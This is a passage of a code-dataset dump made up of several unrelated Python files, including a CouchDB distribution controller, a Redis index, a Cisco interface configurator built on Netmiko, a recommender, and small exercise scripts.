sourceLRNode.getDistributeCredentialFor(destinationURL)\n \n if credential is not None:\n base64string = base64.encodestring('%s:%s' % (credential['username'],credential['password'])).replace(\"\\n\", \"\")\n request.add_header(\"Authorization\", \"Basic %s\" % base64string)\n \n log.info(\"\\n\\nAccess destination node at: \"+pprint.pformat(request.__dict__))\n distributeInfo = json.load(urllib2.urlopen(request))\n destinationLRNode = LRNodeModel(distributeInfo['node_config'])\n except Exception as ex:\n log.exception(ex)\n continue\n # Use of local variable to store if the connection is gateway connection. 
It is\n # done this way to deal with mismatch between node de and connection\n # description.\n isGatewayConnection = (\n (sourceLRNode.nodeDescription.gateway_node == True) and\n (destinationLRNode.nodeDescription.gateway_node ==True))\n # Skip the connection if there is any mismatch between the connection and\n # the node data.\n if isGatewayConnection != connection.gateway_connection:\n log.info(\"Skip connection. 'gateway_connection' mismatch between node and connection data\")\n continue\n \n # Only one gateway connection is allowed, faulty network description\n if len(gatewayConnectionList) > 1:\n log.info(\"***Abort distribution. More than one gateway node connection\")\n #Clear the node destination list no distribution is network description \n # is faulty\n nodeDestinationList = []\n break\n #Calcuate if the connection is gateway one, if so \n #cannot distribute across non social communities\n if ((sourceLRNode.communityDescription.community_id != \n destinationLRNode.communityDescription.community_id) and\n ((sourceLRNode.communityDescription.social_community == False) or\n (destinationLRNode.communityDescription.social_community == False))):\n log.info(\"Cannot distribute across non social communities\")\n continue\n # Cannot distribute across networks (or communities) unless gateway\n if((isGatewayConnection == False) and\n ((sourceLRNode.communityDescription.community_id != \n destinationLRNode.communityDescription.community_id) or\n (sourceLRNode.networkDescription.network_id != \n destinationLRNode.networkDescription.network_id))):\n log.info(\"Different Network. 
Cannot distribute across networks (or communities) unless gateway\")\n continue\n # Gateway must only distribute across different networks.\n if((isGatewayConnection ==True) and\n (sourceLRNode.networkDescription.network_id == \n destinationLRNode.networkDescription.network_id)):\n log.info(\"Gateway must only distribute across different networks\")\n continue\n # Only gateways can distribute on gateway connection. This is really for \n # catching mismatch in the data where a connection says it is between \n # gateways when the nodes are not both gateways.\n if((connection.gateway_connection == True) and \n ((sourceLRNode.nodeDescription.gateway_node == False) or\n (destinationLRNode.nodeDescription.gateway_node == False))):\n log.info(\"Only gateways can distribute on gateway connection\")\n continue\n nodeInfo = { \"distributeInfo\": distributeInfo,\n \"distribute_sink_url\": distributeInfo[\"distribute_sink_url\"],\n \"destinationNode\":destinationLRNode}\n nodeDestinationList.append(nodeInfo)\n \n return nodeDestinationList\n \n def create(self):\n \"\"\"POST / distribute start distribution\"\"\"\n \n def doDistribution(destinationNode, server, sourceUrl, destinationUrl, lock):\n # We want to always use the replication filter function to replicate\n # only distributable doc and filter out any other type of documents.\n # However we don't have any query arguments until we test if there is any filter.\n replicationOptions={'filter':ResourceDataModel.REPLICATION_FILTER, \n 'query_params': None}\n # If the destination node is using an filter and is not custom use it\n # as the query params for the filter function\n if ((destinationNode.filterDescription is not None) and \n (destinationNode.filterDescription.custom_filter == False)):\n replicationOptions['query_params'] = destinationNode.filterDescription.specData\n \n #if distinationNode['distribute service'] .service_auth[\"service_authz\"] is not None:\n #log.info(\"Destination node '{}' require 
authentication\".format(destinationUrl))\n #Try to get the user name and password the url.\n credential = sourceLRNode.getDistributeCredentialFor(destinationUrl)\n if credential is not None:\n parsedUrl = urlparse.urlparse(destinationUrl)\n destinationUrl = destinationUrl.replace(parsedUrl.netloc, \"{0}:{1}@{2}\".format(\n credential['username'], credential['password'], parsedUrl.netloc))\n \n log.info(\"\\n\\nReplication started\\nSource:{0}\\nDestionation:{1}\\nArgs:{2}\".format(\n sourceUrl, destinationUrl, str(replicationOptions)))\n\n if replicationOptions['query_params'] is None: \n del replicationOptions['query_params']\n results = server.replicate(sourceUrl, destinationUrl, **replicationOptions)\n log.debug(\"Replication results: \"+str(results))\n with lock:\n server = couchdb.Server(appConfig['couchdb.url'])\n db = server[appConfig['couchdb.db.node']]\n doc = db[appConfig['lr.nodestatus.docid']]\n doc['last_out_sync'] = h.nowToISO8601Zformat()\n doc['out_sync_node'] = destinationNode.nodeDescription.node_name\n db[appConfig['lr.nodestatus.docid']] = doc\n \n log.info(\"Distribute.......\\n\")\n ##Check if the distribte service is available on the node.\n #if(sourceLRNode.isServiceAvailable(NodeServiceModel.DISTRIBUTE) == False):\n #log.info(\"Distribute not available on node \")\n #return\n if((sourceLRNode.connections is None) or \n (len(sourceLRNode.connections) ==0)):\n log.info(\"No connection present for distribution\")\n return\n log.info(\"Connections: \"+str(sourceLRNode.connections)+\"\\n\")\n lock = threading.Lock()\n for connectionInfo in self._getDistributeDestinations():\n replicationArgs = (connectionInfo['destinationNode'], \n defaultCouchServer, \n self.resource_data, \n connectionInfo[\"distribute_sink_url\"],lock)\n \n # Use a thread to do the actual replication.\n replicationThread = threading.Thread(target=doDistribution, \n args=replicationArgs)\n 
replicationThread.start()\n\n","sub_path":"LR/lr/controllers/distribute.py","file_name":"distribute.py","file_ext":"py","file_size_in_byte":11180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"116364081","text":"# -*- coding: utf-8 -*-\n#\n# Copyright 2010 Tobias Rodäbel\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Redis Datastore Indexes.\n\nPartitioning addresses key issues in supporting very large indexes by letting\nyou decompose them into smaller and more manageable pieces called partitions.\nAlso, partitioning should be entirely transparent to applications.\n\"\"\"\n\n\nimport uuid\n\n\n_SCORE_INDEX = '%(app)s!%(kind)s:%(prop)s:\\vSCORES'\n_PROPERTY_SCORE = '%(app)s!%(kind)s:%(prop)s:\\r%(score)s:\\vKEYS'\n_PROPERTY_VALUE = '%(key)s:%(prop)s'\n_TEMPORARY_KEY = '%(app)s!TEMP:%(uuid)s'\n\n\nclass BaseIndex(object):\n \"\"\"The base index class.\"\"\"\n\n def __init__(self, db, app, kind, prop):\n self.__db = db\n self.__app = app\n self.__kind = kind\n self.__prop = prop\n self.__key = _SCORE_INDEX % locals()\n\n @property\n def db(self):\n return self.__db\n\n @property\n def app(self):\n return self.__app\n\n @property\n def kind(self):\n return self.__kind\n\n @property\n def prop(self):\n return self.__prop\n\n @property\n def key(self):\n return self.__key\n\n def get_score(self, val):\n raise NotImplemented\n\n def _execute(self, func, key, value=None, pipe=None):\n assert func in ('sadd', 
'srem')\n if value is None:\n value = self.db[key]\n if not pipe:\n _pipe = self.db.pipeline()\n else:\n _pipe = pipe\n score = self.get_score(value)\n _pipe = getattr(_pipe, func)(score, key)\n _pipe = getattr(_pipe, func)(self.key, score)\n if pipe:\n return pipe\n else:\n return _pipe.execute()\n\n def add(self, key, value=None, pipe=None):\n return self._execute('sadd', key, value, pipe)\n\n def remove(self, key, value=None, pipe=None):\n return self._execute('srem', key, value, pipe)\n\n def _partitions(self, op, score):\n keys = self.db.sort(self.key)\n if op in ('<', '<='):\n for p in reversed(filter(lambda k: k<=score, keys)): yield p\n if op in ('>', '>='):\n for p in sorted(filter(lambda k: k>=score, keys)): yield p\n\n def get_value(self, val):\n raise NotImplemented\n\n def filter(self, op, value, limit=1000, offset=0):\n \"\"\"Apply filter rules.\n\n Args:\n op: An operator.\n value: A string object.\n limit: The number of results to return.\n offset: The number of results to skip.\n \"\"\"\n score = self.get_score(value)\n results = []\n\n if op == '<':\n cond = (-1,)\n desc = True\n if op == '<=':\n cond = (-1, 0)\n desc = True\n if op == '>':\n cond = (1,)\n desc = False\n if op == '>=':\n cond = (0, 1)\n desc = False\n\n if isinstance(value, basestring):\n alpha = True\n else:\n alpha = False\n\n buf_key = _TEMPORARY_KEY % {'app': self.app, 'uuid': uuid.uuid4()}\n for p in self._partitions(op, score):\n pipe = self.db.pipeline()\n for k in self.db.sort(p):\n pipe = pipe.rpush(buf_key, k)\n pipe.execute()\n\n prop_key = \"*:\"+self.prop\n\n all_values = self.db.sort(\n buf_key, by=prop_key, get=prop_key, alpha=alpha, desc=desc)\n\n if isinstance(value, unicode):\n value = str(value.encode('utf-8'))\n if value not in all_values:\n all_values.append(value)\n all_values.sort(\n lambda a,b:cmp(unicode(a,'utf-8'), unicode(b, 'utf-8')))\n if desc:\n all_values.reverse()\n\n pos = all_values.index(value)\n\n keys = self.db.sort(\n buf_key, by=prop_key, 
alpha=alpha, desc=desc, start=pos+offset,\n num=limit)\n values = self.db.sort(\n buf_key, by=prop_key, get=prop_key, alpha=alpha, desc=desc,\n start=pos+offset, num=limit)\n\n self.db.delete(buf_key)\n\n buf = [(keys[i], self.get_value(values[i]))\n for i in range(len(keys))]\n\n count = 0\n\n for k, v in buf:\n if cmp(v, value.decode('utf-8')) in cond:\n results.append(k)\n count += 1\n if count >= limit:\n break\n \n return results\n\n\nclass StringIndex(BaseIndex):\n \"\"\"Indexing string values.\"\"\"\n\n def __init__(self, db, app, kind, prop, depth=2):\n super(StringIndex, self).__init__(db, app, kind, prop)\n self.__depth = depth\n\n def get_score(self, val):\n d = self.__depth\n score = ''.join([str(ord(c)).zfill(5) for c in val[:d]]).ljust(d*5,'0')\n key_info = dict(\n app=self.app, kind=self.kind, prop=self.prop, score=score)\n return _PROPERTY_SCORE % key_info\n\n def get_value(self, val):\n return val.decode('utf-8')\n","sub_path":"src/typhoonae/redis/indexes.py","file_name":"indexes.py","file_ext":"py","file_size_in_byte":5433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"247982445","text":"#!/usr/bin/env python3.6\n\nfrom netmiko import *\nimport getpass, os, platform, time, sys\nfrom termcolor import cprint\n\ndevicePlatformList = ['ios', 'xe', 'xr']\nsleepTime = 8\n\n\ndef clearScreen():\n if platform.system() == 'Windows':\n os.system('cls')\n else:\n os.system('clear')\n\n cprint('### Powered by Netmiko ###', 'green', attrs=['bold'])\n print('Note that This tool is only interface configurator.\\n')\n\n\ndef credential():\n while True:\n userName = input(\"Devices username(Your credential will not store): \")\n if userName != '':\n userPassword = getpass.getpass()\n return userName,userPassword\n else:\n print(\"Username can not be empty! 
try again.\\n\")\n continue\n\n\ndef platformSelection():\n while True:\n devicePlatform = input(\"Choose platform(IOS, XE, XR): \").lower()\n if devicePlatform not in devicePlatformList:\n print(\"Input correct platform!\\n\")\n continue\n else:\n return devicePlatform\n break\n\n\ndef deviceInfo():\n while True:\n deviceIP = input(\"\\ninput Mgmt address(x.x.x.x): \")\n if len(deviceIP.split('.')) == 4 or (len(deviceIP) > 15):\n return deviceIP\n break\n else:\n print(\"IP address is incorrect.\\n\")\n continue\n\n\n\ndef connection(devicePlatform, deviceIP, userName, userPassword):\n cisco_lab = {\n 'device_type': 'cisco_' + devicePlatform,\n 'ip': deviceIP,\n 'username': userName,\n 'password': userPassword,\n 'port': 22,\n 'timeout': 5,\n\n }\n\n try:\n net_connect = ConnectHandler(**cisco_lab)\n except NetMikoTimeoutException :\n cprint(\"'Connection timed out!'\", 'red', attrs=['bold'], end='')\n print(\", Please check your settings and try again!\\n\")\n appRestart()\n\n except NetMikoAuthenticationException:\n cprint(\"'Authentication Failed!'\", 'red', attrs=['bold'], end='')\n print(\", Please check your settings and try again!\\n\")\n appRestart()\n\n return net_connect\n\n\ndef showInterface(net_connect):\n showIntQ = ''\n while showIntQ not in ('n', 'y'):\n showIntQ = input('Do you want current interface list?(Y/N):').lower()\n if showIntQ == 'y':\n showInt = net_connect.send_command('show ip int br')\n print(showInt)\n\n\ndef configuration(devicePlatform, net_connect, deviceIP):\n interfaceName = ''\n while interfaceName is '':\n interfaceName = input(\"\\nInput type of Interface(e.g. gig0/0/0, tengig0/0/0/0, hungig0/0/0/0, etc.): \").lower()\n\n interfaceDescription = input(\"\\n\\nInput interface description if you prefer(hit enter to skip): \")\n\n subInterface = ''\n dot1q= ''\n while subInterface not in ('n','y'):\n subInterface = input(\"Do you want create sub-interface? 
(Y/N)\").lower()\n if subInterface == 'y':\n while True:\n try:\n dot1q = int(input(\"Input sub Interface value to Config({}.xx): \".format(interfaceName)))\n break\n except:\n print(\"enter in digit format!\\n\")\n elif subInterface == 'n':\n dot1q = 'N/A'\n break\n dot1q = str(dot1q)\n\n while True:\n if devicePlatform == 'xr':\n settingIP = input(\"what IP address and prefix will be set?(A.B.C.D/yy): \")\n if len(settingIP.split('.')) == 4 or (len(settingIP) > 18):\n break\n else:\n print(\"IP address is incorrect.\\n\")\n continue\n else:\n settingIP = input(\"what IP address and subnet mask will be set?(A.B.C.D W.X.Y.Z): \")\n if len(settingIP.split('.')) == 7 or (len(settingIP) > 31):\n break\n else:\n print(\"IP address is incorrect.\\n\")\n continue\n\n\n print('\\n\\nmgmt ip: \\x1B[1;31;40m{}\\x1B[0m\\nInterface: \\x1B[1;31;40m{}\\x1B[0m\\nsub interface: \\x1B[1;31;40m{}\\x1B[0m\\ndescription: \\x1B[1;31;40m{}\\x1B[0m\\ninterface IP address: \\x1B[1;31;40m{}\\x1B[0m\\n\\n'.format(deviceIP, interfaceName, dot1q, interfaceDescription, settingIP))\n\n answer = ''\n while answer not in ('n','y'):\n answer = input('Are these settings Ok?(Y/N):').lower()\n\n if answer == \"y\":\n print('\\noperation starts now ...')\n elif answer == \"n\":\n clearScreen()\n\n if dot1q == \"N/A\":\n if devicePlatform == \"xr\":\n config_commands = ['interface ' + interfaceName , 'no shut', 'ip add ' + settingIP, 'description *** ' + interfaceDescription, 'commit', 'end']\n output = net_connect.send_config_set(config_commands)\n show_ip = settingIP.split('/')\n show_ip = show_ip[0]\n time.sleep(sleepTime)\n output_ip = net_connect.send_command('show ip int br | inc ' + show_ip)\n print(output)\n if 'Up' in output_ip:\n cprint(output_ip, 'green')\n else:\n cprint(output_ip, 'red')\n net_connect.disconnect()\n\n else:\n config_commands = ['interface ' + interfaceName, 'no shut','ip add ' + settingIP, 'description *** ' + interfaceDescription, 'end', 'wr', '\\n']\n output = 
net_connect.send_config_set(config_commands)\n show_ip = settingIP.split(' ')\n show_ip = show_ip[0]\n time.sleep(sleepTime)\n output_ip = net_connect.send_command('show ip int br | inc ' + show_ip)\n print(output)\n if 'up' in output_ip:\n cprint(output_ip, 'green')\n else:\n cprint(output_ip, 'red')\n net_connect.disconnect()\n else:\n if devicePlatform == \"xr\":\n config_commands = ['interface ' + interfaceName , 'no shut', 'interface ' + interfaceName + '.' + dot1q, 'encap dot1q ' + dot1q, 'ip add ' + settingIP , 'description *** ' + interfaceDescription, 'commit', 'end']\n output = net_connect.send_config_set(config_commands)\n show_ip = settingIP.split('/')\n show_ip = show_ip[0]\n time.sleep(sleepTime)\n output_ip = net_connect.send_command('show ip int br | inc ' + show_ip)\n print(output)\n if 'Up' in output_ip:\n cprint(output_ip, 'green')\n else:\n cprint(output_ip, 'red')\n net_connect.disconnect()\n\n else:\n config_commands = ['interface ' + interfaceName , 'no shut', 'interface ' + interfaceName + '.' 
+ dot1q, 'encap dot1q ' + dot1q, 'ip add ' + settingIP , 'description *** ' + interfaceDescription, 'end', 'wr', '\\n']\n output = net_connect.send_config_set(config_commands)\n show_ip = settingIP.split(' ')\n show_ip = show_ip[0]\n time.sleep(sleepTime)\n output_ip = net_connect.send_command('show ip int br | inc ' + show_ip)\n print(output)\n if 'up' in output_ip:\n cprint(output_ip, 'green')\n else:\n cprint(output_ip, 'red')\n net_connect.disconnect()\n appRestart()\n\n\ndef appRestart():\n restartApp = ''\n while restartApp not in ('n','y'):\n restartApp = input(\"Do you want restart app?(Y/N)\").lower()\n if restartApp == 'y':\n python = sys.executable\n os.execl(python, python, *sys.argv)\n elif restartApp == 'n':\n exit()\n\n\ndef main():\n clearScreen()\n username, userpassword = credential()\n deviceplatform = platformSelection()\n deviceinfo = deviceInfo()\n net_connect = connection(deviceplatform, deviceinfo, username, userpassword)\n showInterface(net_connect)\n configuration(deviceplatform, net_connect, deviceinfo)\n\n\nif __name__ == '__main__':\n main()","sub_path":"Cisco_Interface_Configurator.py","file_name":"Cisco_Interface_Configurator.py","file_ext":"py","file_size_in_byte":7814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"468087494","text":"# name : Jeremy Chauvin\n# email : jjchauvin79@gmail.com\n# date : 08 Sept 2016\n# class : CS0008-f2016\n# instructor : Max Novelli (man8@pitt.edu)\n#\n# Description: This converts square meters to acres.\n#\n# Example: Starting with Python, Chapter 2, Exercise 3\n#\n# Notes:\n#\n\n# declare varable to hold sq meters in acre\nsq_m_in_acre = float(4046.8564224)\n\n# get user input of total square meters and assign to varable\ntotal_sq_m = float(input('Enter The amont of square meters to be converted to Acres ---->'))\n\n# perform calculation to convert square meters to acers\ncalculated_acers = (total_sq_ft / sq_m_in_acre )\n\n# output total acers 
to user\nprint(\"Your total acer's are = \", calculated_acers )\n\n","sub_path":"ch2/Ch2-Ex3/ch2-ex3.py","file_name":"ch2-ex3.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"498199583","text":"#!/usr/bin/env python3\r\n\"\"\"\r\nAuthor : donaldscoon\r\nDate : 2019-02-19\r\nPurpose: Skim a bunch of poems\r\n\"\"\"\r\n\r\nimport re\r\nimport os\r\nimport argparse\r\nimport sys\r\n\r\n\r\n# --------------------------------------------------\r\ndef get_args():\r\n \"\"\"get command-line arguments\"\"\"\r\n parser = argparse.ArgumentParser(\r\n description='Argparse Python script',\r\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\r\n\r\n parser.add_argument(\r\n '-w',\r\n '--int',\r\n help='Number of characters per line?',\r\n metavar='int',\r\n type=int,\r\n default=50)\r\n\r\n parser.add_argument(\r\n 'directory', metavar='DIR', help='Chosen directory', nargs='+')\r\n\r\n return parser.parse_args()\r\n\r\n\r\n# --------------------------------------------------\r\ndef warn(msg):\r\n \"\"\"Print a message to STDERR\"\"\"\r\n print(msg, file=sys.stderr)\r\n\r\n\r\n# --------------------------------------------------\r\ndef die(msg='Something bad happened'):\r\n \"\"\"warn() and exit with error\"\"\"\r\n warn(msg)\r\n sys.exit(1)\r\n\r\n#### Perhaps a function to reuse my head program?\r\n\r\n# --------------------------------------------------\r\ndef main():\r\n \"\"\"TOoT toOT tOOt TooT\r\n tots jazz noises\r\n that trombone. 
\"\"\"\r\n\r\n args = get_args()\r\n width = args.int\r\n# dots = '.'*int\r\n #### Error message for not a directory\r\n for dirname in args.directory:\r\n if not os.path.isdir(dirname):\r\n warn('\"{}\" is not a directory'.format(dirname))\r\n continue\r\n\r\n d = {}\r\n# d[line] = file\r\n#sorted(d.items)\r\n print(dirname)\r\n #### creating variables\r\n for file in os.listdir(dirname):\r\n path = os.path.join(dirname, file)\r\n line = open(path).readline().rstrip()\r\n d[line] = file\r\n\r\n for line, file in sorted(d.items()):\r\n linew = len(line)\r\n filew = len(file)\r\n dots = '.'*(width - linew - filew)\r\n\r\n print('{} {} {}'.format(line, dots, file))\r\n####Maybe did it wrong, again\r\n\"\"\" for key in d:\r\n keyw = len(key)\r\n filew = len(file)\r\n dots = '.'*(width - keyw - filew)\r\n \r\n print('{}{}{}'.format(key, dots, file))\r\n\r\n\"\"\"\r\n\r\n\r\n\r\n\r\n #### HOARD ALL THE CODE\r\n\"\"\" for file in os.listdir(dirname):\r\n filelocation = dirname + '/' + file\r\n with open(filelocation) as poem:\r\n for line in poem:\r\n\r\n d = {'line': (line), 'ellipse': (dots), 'file': (path)}\r\n print(d.get('line'),end='')\r\n print(d.get('ellipse'))\r\n print(d.get('file'))\r\n #print('{} {}'.format(d.get('line'), (d.get('ellipse'))\r\n\"\"\"\r\n\r\n #### old code I am hoarding just in case\r\n\"\"\" for file in os.listdir(dirname):\r\n print('.'*int + ' {}'.format(file))\r\n filelocation = dirname + '/' + file\r\n with open(filelocation) as poem:\r\n for line in poem:\r\n #print('{} {} {}'.format(line, dots, file), end='')\r\n print('{} '.format(line) + ' {} '.format(dots) + ' {}'.format(dots), end='')\r\n\"\"\"\r\n\r\n\r\n# --------------------------------------------------\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"assignments/06-python-first-lines/first_lines.py","file_name":"first_lines.py","file_ext":"py","file_size_in_byte":3201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} 
+{"seq_id":"589026256","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport sys\nimport operator\nimport csv\nimport string\nimport pprint\nimport random\nimport math\n\ndef splitData(data, k, M, seed):\n\ttest = []\n\ttrain = []\n\trandom.seed(seed)\n\tfor user, item in data:\n\t\tif random.randint(0, M) == k:\n\t\t\ttest.append([user, item])\n\t\telse:\n\t\t\ttrain.append([user, item])\n\n\treturn train, test\n\ndef Recall(train, test, W, N):\n\thit = 0\n\tAll = 0\n\tfor user in train.keys():\n\t\tif user not in test.keys():\n\t\t\tcontinue\n\t\ttestItems = test[user]\n\t\trank = GetRecommendation(train, user, W, N)\n\t\tfor item, pui in rank.items():\n\t\t\tif item in testItems:\n\t\t\t\thit += 1\n\t\tAll += len(testItems)\n\treturn float(\"%.5f\"%(hit / (All * 1.0)))\n\ndef Precision(train, test, W, N):\n\thit = 0\n\tAll = 0\n\tfor user in train.keys():\n\t\tif user not in test.keys():\n\t\t\tcontinue\n\t\ttestItems = test[user]\n\t\trank = GetRecommendation(train, user, W, N)\n\t\tfor item, pui in rank.items():\n\t\t\tif item in testItems:\n\t\t\t\thit += 1\n\t\tAll += N\n\n\treturn float(\"%.5f\"%(hit / (All * 1.0)))\n\ndef Popularity(train, test, W, N):\n\titem_popularity = dict()\n\tfor user, items in train.items():\n\t\tfor item in items:\n\t\t\tif item not in item_popularity:\n\t\t\t\titem_popularity[item] = 0\n\t\t\titem_popularity[item] += 1\n\t#pprint.pprint(item_popularity)\n\n\tret = 0\n\tp = 0\n\tfor user in train.keys():\n\t\trank = GetRecommendation(train, user, W, N)\n\t\tfor item, pui in rank.items():\n\t\t\tif item not in item_popularity:\n\t\t\t\tcontinue\n\t\t\tp += math.log(1 + item_popularity[item])\n\t\t\tret += 1\n\n\treturn float(\"%.5f\"%(p / ( ret * 1.0 )))\n\n# 计算平均流行度时对每个物品的流行度取对数,\n# 因为物品的流行度分布满足长尾分布,在取对数后,流行度的平均值更加稳定\n\ndef Coverage(train, test, W, N):\n\trecommend_items = set()\n\tall_items = set()\n\n\tfor user in train.keys():\n\t\tfor item in train[user]:\n\t\t\tall_items.add(item)\n\n\t\trank = GetRecommendation(train, 
user, W, N)\n\t\tfor item, pui in rank.items():\n\t\t\trecommend_items.add(item)\n\n\treturn float(\"%.5f\"%(len(recommend_items) / (len(all_items) * 1.0)))\n\n\n\ndef ItemSimilarity(train):\n\t# 计算共现矩阵\n\tN = {}\n\tC = {}\n\n\tfor u, items in train.items():\n\t\tfor i in items:\n\t\t\tN[i] = N.get(i, 0) + 1\n\n\t\t\tif i not in C.keys():\n\t\t\t\tC[i] = {}\n\t\t\tfor j in items:\n\t\t\t\tif i == j:\n\t\t\t\t\tcontinue\n\t\t\t\tC[i][j] = C[i].get(j, 0) + 1\n\t# 计算最终相似度\n\t# W = {}\n\t# for i, related_items in C.items():\n\t# \tif i not in W.keys():\n\t# \t\tW[i] = {}\n\t# \tfor j, cij in related_items.items():\n\t\t\t\n\t# \t\tW[i][j] = float(\"%.3f\"% (cij / math.sqrt(N[i] * N[j] * 1.0)))\n\n\t# return W\n\treturn C\n\ndef GetRecommendation(train, user, W, K):\n\trank = {}\n\ttrainItems = train[user]\n\tpi = 1.0\n\tfor i in trainItems:\n\t\tfor j , wj in sorted(W[i].items(), key = operator.itemgetter(1), reverse=True)[0:K]:\n\t\t\t#if j in trainItems:\n\t\t\t\t#continue\n\t\t\trank[j] = rank.get(j, 0) + pi * wj\n\t\t\t#rank[j].reason[i] = pi * wj\n\n\treturn rank\n\ndef GenericRecommendationList(train, W, K):\n\twith open(\"recommendation.txt\", 'w') as rec:\n\t\tfor user in train.keys():\n\t\t\trank = GetRecommendation(train, user, W, K)\n\t\t\t\n\t\t\trec.write(\"{0}\\t\".format(user))\n\t\t\ttopN = sorted(rank, key = lambda x: rank[x], reverse = True)\n\t\t\tfor item in topN:\n\t\t\t\trec.write(\"{0}:{1}\\t\".format(item, rank[item]))\n\t\t\trec.write(\"\\n\")\n\n\ndef GetInvertedList(data):\n\tret = {}\n\tfor user, item in data:\n\t\tif user not in ret.keys():\n\t\t\tret[user] = []\n\t\tif item in ret[user]:\n\t\t\tcontinue\n\t\tret[user].append(item)\n\n\treturn ret\n\ndef GetData():\n\treader = csv.reader(sys.stdin, delimiter=\"\\t\")\n\tnext(reader, None)\n\n\tdata = []\n\tfor line in reader:\n\t\tif len(line) != 2:\n\t\t\tcontinue\n\t\tuser = line[0]\n\t\titems = line[1].translate(None, string.punctuation).split()\n\t\tfor item in 
items:\n\t\t\tdata.append([user, item])\n\n\treturn data\n\n\ndef main():\n\tdata = GetData()\n\ttrain = GetInvertedList(data)\n\tW = ItemSimilarity(train)\n\tGenericRecommendationList(train, W, 10)\n\t\n\t# M = 8\n\t# recall = 0.0\n\t# precision = 0.0\n\t# cover = 0.0\n\t# popu = 0.0\n\t# for k in range(M):\n\t# \tseed = 1000\n\t# \ttrain, test = splitData(data, k, M, seed)\n\n\t# \t# get inverted list\n\t# \ttrain = GetInvertedList(train)\n\t# \ttest = GetInvertedList(test)\n\t# \t#pprint.pprint(train)\n\t# \t#pprint.pprint(test)\n\n\t# \tW = ItemSimilarity(train)\n\t# \t#pprint.pprint(W)\n\n\t# \ttopK = 20# 3, 5, 10, 20\n\t# \trecall += Recall(train, test, W, topK)\n\t# \tprecision += Precision(train, test, W, topK)\n\t# \tcover += Coverage(train, test, W, topK)\n\t# \tpopu += Popularity(train, test, W, topK)\n\n\t# print recall/M, precision/M, cover/M, popu/M\n\n\nif __name__ == '__main__':\n\tmain()\n\n\n\n","sub_path":"recsys/coocMatRecommend.py","file_name":"coocMatRecommend.py","file_ext":"py","file_size_in_byte":4486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"41441825","text":"\"\"\"\nPrediction Service End Point\n\"\"\"\nimport time\n\nfrom fastapi.routing import APIRouter\nfrom src.utils.logging_util import Logger\nfrom src.configurations.app_configs import AppConfigs\nfrom src.domain.request_response_schemas import (\n PredictionServiceRequest,\n PredictionServiceResponse,\n)\nfrom src.services.prediction_service import PredictionService\n\nrouter = APIRouter()\n\nLOGGER = Logger.get_instance()\nAPP_CONFIGS = AppConfigs.get_instance()\n\n\n@router.post(\n \"/predict\", tags=[\"Prediction Service\"], response_model=PredictionServiceResponse\n)\nasync def get_response(request: PredictionServiceRequest):\n \"\"\"\n This end point predicts the label for the given text and returns the result in the response.\n\n :param request: The request for the API.\n\n :return: The response with the prediction 
results.\n \"\"\"\n tic = time.time()\n LOGGER.logger.info(\"Request: %s\", request.json())\n prediction_service_response = PredictionService.get_response(request.text)\n LOGGER.logger.info(\n \"Total time taken to respond: %s ms.\\n\", round(1000 * (time.time() - tic), 2)\n )\n return prediction_service_response\n","sub_path":"src/routers/v1.py","file_name":"v1.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"161112800","text":"import numpy as np\nimport cv2\nimport matplotlib.image as img\nimport matplotlib.pyplot as plt\nimport datetime\nfrom os import listdir\nimport os\n\n\nforder = \"data_detection/Long_Lan_image\" # forder chứa ảnh cần xác định face\nwrong_detects = 0 # biến đếm ảnh mà mtcnn k phát hiện được face\ntotal_image = 0\narr = []\nprint(\"start time\")\nprint(datetime.datetime.now().time())\nfor filename in listdir(forder):\n total_image += 1\n path = forder + \"/\" + filename\n face_cascade = cv2.CascadeClassifier(r'haarcascade_frontalface_default.xml')\n image = plt.imread(path)\n\n faces = face_cascade.detectMultiScale(image, 1.3, 5)\n if len(faces) == 0:\n wrong_detects += 1\n arr.append(filename)\n cv2.imwrite(os.path.join(\"wrong\" , filename), image)\n\n continue\n elif len(faces) == 1:\n wrong_detects += 1\n\n for (x, y, w, h) in faces:\n cv2.rectangle(image, (x, y), (x + w, y + h), (255,0 , 0), 2)\n # cv2.imwrite(filename, image)\n cv2.imwrite(os.path.join(\"miss_1\" , filename), image)\n\n else:\n for (x, y, w, h) in faces:\n cv2.rectangle(image, (x, y), (x + w, y + h), (255,0 , 0), 2)\n # cv2.imwrite(filename, image)\n cv2.imwrite(os.path.join(\"right\" , filename), image)\nprint(\"end time\")\nprint(datetime.datetime.now().time())\nprint(arr)\nprint(\"wrong detects:\",wrong_detects)\nprint(\"total images:\", 
